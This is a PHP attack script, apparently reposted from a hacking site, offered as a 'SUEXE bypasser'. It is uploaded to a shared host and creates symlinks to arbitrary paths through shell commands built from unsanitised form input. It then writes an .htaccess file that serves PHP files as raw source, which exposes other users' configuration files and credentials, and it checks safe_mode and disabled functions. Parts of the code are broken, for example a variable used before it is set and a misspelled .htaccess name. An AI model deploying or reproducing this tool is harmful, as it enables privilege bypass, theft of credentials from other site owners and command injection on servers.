Suexe Bypass via Symlink |www.pemula.info

1. <html>
2. <body bgcolor="0000000">
3. <title>symlink</title>
4. <center><b><h2><font color="red"> SUEXE Bypasser Via Symlink (V 1.01)</font></br></center></b></h2>
5. <center><b><h4><font color="red">WITH THIS SCRIPT U CAN USE SYMLINK IN 2 METHODs</font></br></center></b></h4>
6. <center><b><h4><font color="white">Dest = Destenation Of Path or file That u Want to Symlink It</font></br></center></b></h4>
7. <center><b><h4><font color="white">name : File Name That u Want To create in ([path]/smlnk)</font></br></center></b></h4>
8. <center><b><h4><font color="white">Upload This Script In Full SUEXE or FullPerm Directory</font></br></center></b></h4>
9. <center><b><h4><font color="white">Written For *NIX Platforms</font></br></center></b></h4>
10. </html>
11.  
12. <?php
13. //CODED BY IRAN
14. //form defining
15. print "<form method=post>";
16. print "<center><font color=green>";
17. print "<b>dest :</b><input size=50 name='destenation' value=''>";
18. print "<br>";
19. print "<b>name :</b><input size=50 name='name' value=''>";
20. print "<br>";
21. print "<input type=submit name=_act value='Create!'>";
22. print "</center></font>";
23. $dest = $_POST['destenation'];
24. $destname = $_POST['name'];
25. ?>
26.  
27. <?php
28. //defining variables
29. $dir = dirname($_SERVER[SCRIPT_FILENAME])."/smlnk";
30. $acc = $dir."/.htaceess";
31. $cmd = "ln -s".chr(32).$dest.chr(32).$sym;
32. $sym = $dir."/".$destname;
33. $htaccess =  
34. "Options +FollowSymLinks".chr(009).
35. "DirectoryIndex seees.html".chr(009).
36. "RemoveHandler .php".chr(009).
37. "AddType application/octet-stream .php";
38.  
39. if (!file_exists($dir)) {
40. mkdir ($dir);
41. }  
42. sleep(1);
43. if (!file_exists($acc)) {
44. $handle = fopen( "$acc" , 'a+' );
45. fputs( $handle ,  "$htaccess" );
46. }  
47. ?>
48.  
49. <?php
50. //check method
51. if (function_exists (exec) OR function_exists (shell_exec) OR function_exists (system) OR function_exists (passthru)) {
52. $check = 1;
53. }else{
54. $check = 0;
55. }
56. if(function_exists (symlink)) {
57. $checks = 1;
58. }else{
59. $checks = 0;
60. }
61. ?>
62.  
63. <?php
64. //define command function
65. $resault = '';  
66. function command($cmde) {
67.     if (!empty($cmde))  
68.  {  
69. if (function_exists('exec')) { $resault = @exec($cmde); }  
70. elseif (function_exists('shell_exec')) { $resault = @shell_exec($cmde); }  
71. elseif (function_exists('system')) { $resault = @system($cmde); }  
72. elseif (function_exists('passthru')) { $resault = @passthru($cmde); }  
73.  }
74. return $resault;
75. }
76. ?>
77.  
78. <?php
79. //execution
80. if ($check ==1 && $checks ==1){ command ($cmd); }
81. elseif ($check ==1 && $checks ==0){ command ($cmd); }
82. elseif ($check ==0 && $checks ==1) { symlink ($dest,$sym); }
83. elseif ($check ==0 && $checks ==0)  
84. {  
85. print ("<center><font color=green><h1>script doesnt work for this server</font></h1></center>");  
86. }
87. ?>
88. <?php
89. //is safe mod on ? start
90. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  
91. {  
92. $safe="<font color=red>ON</font>";
93. }  
94. else {$safe="<font color=green>OFF</font>";}
95. echo "<font color=whitepurple>SAFE MOD IS :</font><b>$safe</b><br>";
96. //open safe mod end--
97. ?>  
98. <?php
99. //disable function start
100. echo "<font color=whitepurple>Disable functions :</font> <b>";
101. if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
102. //disable function end--
103. ?>